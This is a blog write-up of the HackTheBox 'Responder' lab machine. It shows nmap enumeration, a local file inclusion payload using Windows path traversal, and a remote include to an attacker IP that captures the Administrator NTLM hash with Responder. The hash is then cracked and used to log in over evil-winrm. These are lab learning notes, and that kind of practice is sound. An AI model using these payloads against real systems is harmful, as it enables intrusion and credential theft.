HackTheBox

Responder

Responder is a boot2root challenge on HackTheBox. It has “Very Easy” difficulty and is part of starting point challenges.

Enumeration

Enumeration started with an Nmap scan. The following command will scan top ports of the target and use scripts and version enumeration. The results will be output to a file called “initial”. I also increased the verbosity of the scan with -vv

sudo nmap 10.129.185.223 -sC -sV -oN initial -vv

After the scan, we can see that the target is running an Apache web server on port 80.

After that I started another scan, which scans for all ports of the target:

sudo nmap 10.129.185.223 -p- -oN all_ports -vv

The second scan showed that there were 3 ports open.

I’ve scanned the target again with Rustscan and it seemed liked port 7680 is closed. So this was a false positive.

Analyzing the web server

After opening the IP in a web server to navigate to the web server, we get redirected to “unika.htb”.

So I have added that domain to my /etc/hosts file.

After that I was able to open the web page.

With Wappalyzer I was able to analyze which technologies are used. Interesting ones are that the target is a Windows server and uses PHP as programming language.

The web page has the functionality to change language. When changing the parameter “page” is used followed by a HTML file name.

Next I tested that parameter for an local file inclusion vulnerability. I tried to load the hosts file on the server. Because this server is a Windows hosts I used the following path:

../../../../../../../../windows/system32/drivers/etc/hosts

After that I tried to load a remote file. First I started responder on tun0 interface, because that’s the interface, with which I am connected to the HTB network:

sudo responder -I tun0

Next I send the following GET request:

http://unika.htb/index.php?page=//MY_IP/test

That request worked and I was able to see the NTLM hash of the Administrator user of the target machine:

I saved that hash into a file called “hash.txt” and used JohnTheRipper to crack the hash. I used “rockyou.txt” password list.

Getting the flag

From the scans we know, that WinRM is running on the server. So I connected as Administrator to the target using evil-winrm:

evil-winrm -i 10.129.185.223 -u Administrator -p badminton

The flag was inside the Desktop of user mike :

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rabbit

Rabbit

161 Followers

Passionate about Cyber Security. I am publishing CTF Writeups and Cybersecurity Content!